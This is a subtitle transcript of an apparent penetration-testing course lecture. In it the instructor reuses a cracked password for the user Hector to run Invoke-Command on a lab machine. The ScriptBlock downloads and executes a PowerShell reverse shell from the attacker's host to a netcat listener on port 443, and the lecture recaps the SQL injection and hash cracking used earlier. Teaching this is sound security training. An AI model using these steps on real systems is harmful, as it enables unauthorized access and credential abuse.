1
00:00:00,390 --> 00:00:08,280
OK, so we've got access as the user account for the IIS, you can see these are the files inside of

2
00:00:08,280 --> 00:00:09,290
the local webapp.

3
00:00:09,660 --> 00:00:10,200
What can we do?

4
00:00:10,210 --> 00:00:13,110
We need to get Hector.

5
00:00:15,460 --> 00:00:19,900
And we can see Hector is actually a member of this Remote Management Users group.

6
00:00:21,340 --> 00:00:25,290
So the next thing we need to do is figure out what is this Remote Management Users group?

7
00:00:25,300 --> 00:00:27,640
We're going to look it up on Google.

8
00:00:27,640 --> 00:00:35,790
And let's see, it's Remote Management Users, PowerShell.

9
00:00:35,950 --> 00:00:40,140
So remoting, PowerShell remoting, is basically SSH for Windows.

10
00:00:41,050 --> 00:00:45,940
So this user may have the ability to move laterally to other accounts, which is a good thing to know.

11
00:00:47,530 --> 00:00:52,650
So let's just go back here and let's think about this.

12
00:00:53,500 --> 00:01:03,370
We want to gain access as this particular user and we actually have creds.

13
00:01:04,840 --> 00:01:08,650
We have Hector's creds; it looks like Hector's creds are right here.

14
00:01:09,190 --> 00:01:15,070
So we might be able to use these creds to log in as Hector.

15
00:01:15,850 --> 00:01:16,210
Right.

16
00:01:17,980 --> 00:01:18,330
All right.

17
00:01:18,340 --> 00:01:20,770
So how do we do that?

18
00:01:20,820 --> 00:01:25,740
Well, first, we probably should get PowerShell installed on our local box.

19
00:01:26,950 --> 00:01:40,210
If you go to the PowerShell GitHub, actually the PowerShell on Linux docs, you'll see this long post.

20
00:01:42,700 --> 00:01:47,990
And if you take this stuff right here, you just click copy it.

21
00:01:48,130 --> 00:01:49,210
Copy it to the clipboard.

22
00:01:50,700 --> 00:01:51,640
Let's clear this.

23
00:01:53,680 --> 00:02:01,630
Paste it into the terminal and it will try to install PowerShell and actually launch it.

24
00:02:04,220 --> 00:02:04,720
There we go.

25
00:02:05,480 --> 00:02:07,220
$PSVersionTable,

26
00:02:10,640 --> 00:02:13,100
we now have PowerShell on our local box.

27
00:02:13,580 --> 00:02:14,240
Isn't that sweet?

28
00:02:14,930 --> 00:02:17,930
Yeah, PowerShell version seven is actually cross platform.

29
00:02:17,960 --> 00:02:20,020
It's not just a Windows tool anymore.

30
00:02:20,030 --> 00:02:20,760
I don't know if you knew that.

31
00:02:20,780 --> 00:02:21,680
A lot of people don't.

32
00:02:22,580 --> 00:02:23,300
But I would.

33
00:02:23,300 --> 00:02:28,400
Version six actually is when they moved over to the .NET Core framework, which is different than

34
00:02:28,400 --> 00:02:35,300
.NET because .NET Core is cross platform, and version seven is the latest iteration that has almost

35
00:02:35,300 --> 00:02:40,010
all the functionality of the previous versions and more: more commands, lots more modules, more everything,

36
00:02:40,010 --> 00:02:40,640
more awesome.

37
00:02:41,120 --> 00:02:41,420
All right.

38
00:02:41,420 --> 00:02:42,190
So Ctrl+L.

39
00:02:43,460 --> 00:02:44,240
What are we gonna do here?

40
00:02:44,480 --> 00:02:45,320
What are we going to play?

41
00:02:46,340 --> 00:02:46,640
All right.

42
00:02:46,650 --> 00:02:52,050
So how do we do this?

43
00:02:52,310 --> 00:02:53,510
Well, let's create some variables.

44
00:02:53,510 --> 00:02:57,410
First, $username equals Hector.

45
00:02:59,240 --> 00:03:00,710
$username gets.

46
00:03:00,710 --> 00:03:02,840
We have Hector. Sweet. Password.

47
00:03:03,490 --> 00:03:04,280
What is the password?

48
00:03:04,430 --> 00:03:06,360
We need to convert the password to a secure string.

49
00:03:06,380 --> 00:03:08,870
So how do we do that of it is zero.

50
00:03:09,500 --> 00:03:09,980
That's zero.

51
00:03:09,980 --> 00:03:14,600
We're in PowerShell: Get-Help, and we can do like SecureString.

52
00:03:16,820 --> 00:03:17,240
Yes.

53
00:03:17,240 --> 00:03:24,290
So we have a command, ConvertFrom-SecureString, and ConvertTo-SecureString; we want to do ConvertTo-SecureString.

54
00:03:24,440 --> 00:03:24,830
Right.

55
00:03:25,580 --> 00:03:29,630
ConvertTo-SecureString, detailed.

56
00:03:30,560 --> 00:03:35,090
And I hit Tab to autocomplete that; in fact, if I backspace this out and I hit Tab here, it shows me

57
00:03:35,090 --> 00:03:45,740
all of the options I have, and if I just did -Parameter like this and then I hit star, you know, just

58
00:03:45,740 --> 00:03:46,760
show me all the parameters.

59
00:03:48,350 --> 00:03:54,460
So now I know which parameters I need to pass to this tool to convert everything to a secure string.

60
00:03:55,670 --> 00:03:55,930
Right.

61
00:03:55,940 --> 00:03:56,720
That's what this does.

62
00:03:56,900 --> 00:04:00,350
It's going to convert the clear text password into a secure string so we can use it.

63
00:04:01,670 --> 00:04:06,970
And we have it as -AsPlainText, which specifies a plain text string to convert to a secure string.

64
00:04:06,980 --> 00:04:12,260
So we probably want that, and then -Force, which confirms that you understand the implications of using

65
00:04:12,260 --> 00:04:13,070
the -AsPlainText.

66
00:04:13,100 --> 00:04:13,480
All right.

67
00:04:14,000 --> 00:04:21,200
So let's just do this and let's go up.

68
00:04:22,610 --> 00:04:27,830
Oh, by the way, one of the things you should do is you should actually do update help.

69
00:04:29,210 --> 00:04:32,450
So you get the latest help files for PowerShell.

70
00:04:33,110 --> 00:04:37,640
And if you don't do this, you'll actually have incomplete help files, and it would be very difficult and

71
00:04:37,640 --> 00:04:39,740
frustrating when you're trying to figure out what's happening.

72
00:04:41,270 --> 00:04:49,280
So Ctrl+A, bracket. In terms of what this does here: converts encrypted standard strings to secure strings.

73
00:04:49,430 --> 00:04:52,790
It can also convert plaintext strings to secure strings.

74
00:04:52,910 --> 00:04:53,230
Right.

75
00:04:54,080 --> 00:04:55,470
So that is precisely what we want to do.

76
00:04:56,900 --> 00:04:59,180
So let's go back to where we were before

77
00:05:02,270 --> 00:05:03,650
and we want to use -AsPlainText.

78
00:05:03,650 --> 00:05:03,920
Right.

79
00:05:06,450 --> 00:05:18,780
So let's go over here and let's type, let's say, $password equals ConvertTo-SecureString and put the

80
00:05:18,780 --> 00:05:19,350
string in there.

81
00:05:20,520 --> 00:05:25,680
So Ctrl+Shift+T, cat creds.

82
00:05:26,610 --> 00:05:27,830
cat creds.

83
00:05:28,860 --> 00:05:30,240
Let's grab this password here.

84
00:05:34,160 --> 00:05:43,480
Ctrl+Shift+C, Ctrl+Shift+V, put that in single quotes, Ctrl+Shift+V to paste,

85
00:05:45,180 --> 00:05:54,510
hold down Ctrl+Right arrow to go to the end, then -AsPlainText and -Force, no error

86
00:05:54,510 --> 00:05:54,900
messages.

87
00:05:54,900 --> 00:06:00,630
So that's the password, we've got that, nice, and we're probably also going to do the hostname.

88
00:06:00,630 --> 00:06:01,710
So we'll save the hostname

89
00:06:04,260 --> 00:06:07,320
as a variable, Fidelity.

90
00:06:09,900 --> 00:06:10,110
All right.

91
00:06:10,110 --> 00:06:11,300
So now we've got a secure string.

92
00:06:12,180 --> 00:06:18,270
Let's go ahead and build our credential objects so we can make use of the string and execute commands

93
00:06:18,270 --> 00:06:19,890
as Hector on this local box.

94
00:06:20,760 --> 00:06:23,030
So let's get out of here and let's.

95
00:06:23,070 --> 00:06:28,590
Do Get-Help, actually Get-Help.

96
00:06:29,750 --> 00:06:32,850
PS, Get, let's see.

97
00:06:33,930 --> 00:06:40,200
This is the credential, and you can see there's a Get-Credential command.

98
00:06:40,340 --> 00:06:48,630
So if I do Get-Help Get-Credential -Parameter *.

99
00:06:53,800 --> 00:06:59,440
You can see it belongs to this class, System.Management.Automation, so

100
00:06:59,440 --> 00:07:03,670
we use the cmdlet that's called New-Object and we'll name it

101
00:07:08,440 --> 00:07:20,500
$credential equals New-Object System.Management.Automation.PSCredentials.

102
00:07:21,940 --> 00:07:25,600
And what we're going to do is we're going to put in username and password.

103
00:07:29,380 --> 00:07:35,290
That's because I put an S there; it should just be PSCredential, a nice credential.

104
00:07:36,430 --> 00:07:37,870
And we see we've got this object.

105
00:07:38,320 --> 00:07:41,860
Now, the last thing we need to do is invoke the command on the local box.

106
00:07:42,400 --> 00:07:44,080
So again, Get-Help.

107
00:07:45,220 --> 00:07:47,530
Invoke-Command.

108
00:07:54,080 --> 00:07:57,620
That did a little bit too much, let's just do Invoke-Command.

109
00:07:58,700 --> 00:07:59,150
Yes.

110
00:08:00,950 --> 00:08:07,610
So what this does is it will run a command, runs commands on a local or remote computer and returns

111
00:08:07,610 --> 00:08:08,750
all output from those commands.

112
00:08:09,410 --> 00:08:14,750
So we're going to actually run Invoke-Command from the perspective of the victim machine, and therefore

113
00:08:14,750 --> 00:08:20,750
it will return the results from the local machine, the victim machine, to us, the attacker. OK, that

114
00:08:20,750 --> 00:08:21,260
makes sense.

115
00:08:23,210 --> 00:08:24,680
-Parameter *.

116
00:08:25,340 --> 00:08:27,380
Let's see what parameters we have here.

117
00:08:30,500 --> 00:08:31,160
We've got a lot.

118
00:08:32,220 --> 00:08:33,050
We really need a few.

119
00:08:35,190 --> 00:08:42,250
So -AllowRedirection, -ApplicationName, -ArgumentList.

120
00:08:42,270 --> 00:08:43,500
No, no, no.

121
00:08:46,710 --> 00:08:47,700
OK, -ComputerName.

122
00:08:48,100 --> 00:08:55,770
Let's put that in there, so we can say Invoke-Command -ComputerName is hostname.

123
00:08:57,150 --> 00:08:58,070
Get that from here.

124
00:08:59,700 --> 00:09:00,030
Right.

125
00:09:01,830 --> 00:09:03,340
Let's put this parameter in.

126
00:09:05,130 --> 00:09:06,000
What else do we need?

127
00:09:07,240 --> 00:09:09,510
A page down.

128
00:09:13,640 --> 00:09:17,330
-Credential specifies a user account that has permission to perform this action.

129
00:09:17,990 --> 00:09:19,250
The default is the current user.

130
00:09:20,360 --> 00:09:29,270
So let's go ahead and put this in: -Credential, credential, the variable that holds

131
00:09:29,270 --> 00:09:36,800
our credential object, and then -ScriptBlock, which specifies the command to run; enclose the command in

132
00:09:36,800 --> 00:09:37,580
the curly braces.

133
00:09:38,300 --> 00:09:38,560
All right.

134
00:09:38,570 --> 00:09:44,510
This is exactly what we want because we need a script block.

135
00:09:45,320 --> 00:09:49,070
Yes, we can now put a command in here, and what command is it

136
00:09:49,070 --> 00:09:49,780
that we want to put in here?

137
00:09:51,200 --> 00:09:53,000
Well, what about a command, Hector?

138
00:09:53,090 --> 00:09:57,050
What command do you think we would want to run as an attacker, as Hector?

139
00:09:58,550 --> 00:09:59,510
Think about this for a second.

140
00:10:00,620 --> 00:10:01,400
We want to get a shell.

141
00:10:01,400 --> 00:10:01,720
Right.

142
00:10:02,120 --> 00:10:11,030
So if we do an IEX of a web request to port 443 again, we will download

143
00:10:11,450 --> 00:10:18,080
our shell, but we'll download it in the security context of this credentialed user, which is Hector,

144
00:10:18,080 --> 00:10:19,710
which means we should have a shell as Hector.

145
00:10:20,210 --> 00:10:20,890
All right, let's try it.

146
00:10:21,740 --> 00:10:30,300
So we'll say IEX, Invoke-Expression, and then Invoke-WebRequest 14 10

147
00:10:33,250 --> 00:10:34,330
Invoke-PowerShellTcp,

148
00:10:34,490 --> 00:10:38,030
-UseBasicParsing.

149
00:10:39,410 --> 00:10:44,960
And before we do that, we need to make sure that we're listening on port 443, because

150
00:10:44,960 --> 00:10:47,850
remember, this is going to try to connect back on port 443.

151
00:10:47,870 --> 00:10:52,460
So Ctrl+Shift+T, rlwrap.

152
00:10:53,570 --> 00:11:01,540
And by the way, the reason I'm using rlwrap: rlwrap is a tool that gives us the up/down arrow functionality.

153
00:11:01,550 --> 00:11:05,150
So if you do which rlwrap.

154
00:11:10,060 --> 00:11:13,270
apt search rlwrap.

155
00:11:17,190 --> 00:11:22,260
See, readline feature command line wrapper; this means when we get our shell back on the Windows box,

156
00:11:22,260 --> 00:11:23,580
we'll have the up/down arrows.

157
00:11:23,590 --> 00:11:27,110
If we don't pass netcat to rlwrap, we'll lose that.

158
00:11:27,110 --> 00:11:33,060
And it gets really frustrating when you try to navigate on the box, so we throw rlwrap in front of

159
00:11:33,060 --> 00:11:33,450
netcat.

160
00:11:34,830 --> 00:11:36,450
-n, don't resolve those names.

161
00:11:36,450 --> 00:11:37,110
-v, make it verbose.

162
00:11:37,110 --> 00:11:38,660
Listen on port 443.

163
00:11:39,570 --> 00:11:39,900
All right.

164
00:11:40,830 --> 00:11:42,300
And then let's do it and see if it works.

165
00:11:44,570 --> 00:11:44,880
All right.

166
00:11:44,890 --> 00:11:47,130
It looks like we forgot something.

167
00:11:47,310 --> 00:11:48,800
It actually tells you exactly what we forgot.

168
00:11:48,810 --> 00:11:52,050
Missing closing parenthesis, right at the opening parenthesis here.

169
00:11:52,560 --> 00:11:53,730
We missed the closing one here.

170
00:11:54,330 --> 00:11:56,370
So let's just put it in.

171
00:12:02,280 --> 00:12:02,570
Sweet.

172
00:12:03,420 --> 00:12:07,430
You know we're Hector, as you can see from Hector here and from here.

173
00:12:08,400 --> 00:12:13,110
So now that we are Hector, we need to find a way to move vertically.

174
00:12:13,110 --> 00:12:21,900
So we did horizontal escalation, and we're going to move into the vertical escalation.

175
00:12:21,940 --> 00:12:23,680
Remember how we did the horizontal escalation?

176
00:12:23,700 --> 00:12:27,000
We found clear text credentials inside the database.

177
00:12:28,200 --> 00:12:33,090
Of course, the condition there was that they were hashed, but we were able to obtain those credentials

178
00:12:33,870 --> 00:12:40,610
by exploiting a publicly facing Web application, which is this Fidelity application.

179
00:12:40,920 --> 00:12:45,870
There was a SQL injection inside of one of the parameters, actually multiple parameters, but in

180
00:12:45,870 --> 00:12:48,570
this case, inside the search of their catalog database.

181
00:12:49,050 --> 00:12:55,190
And we were able to exfil the MySQL users table, which contained those hashes, and the hashes.

182
00:12:55,200 --> 00:12:56,760
It might make it a little bit difficult to crack.

183
00:12:56,760 --> 00:12:57,690
They weren't salted, either.

184
00:12:57,690 --> 00:13:01,080
So I just want to get you up to speed on what we did and what we're doing.

185
00:13:01,230 --> 00:13:04,110
And this is typically what you would do when you're typing up a report for a pen test.

186
00:13:04,830 --> 00:13:05,220
All right.

187
00:13:05,230 --> 00:13:12,570
So in the next lecture, we are going to escalate from Hector to SYSTEM.
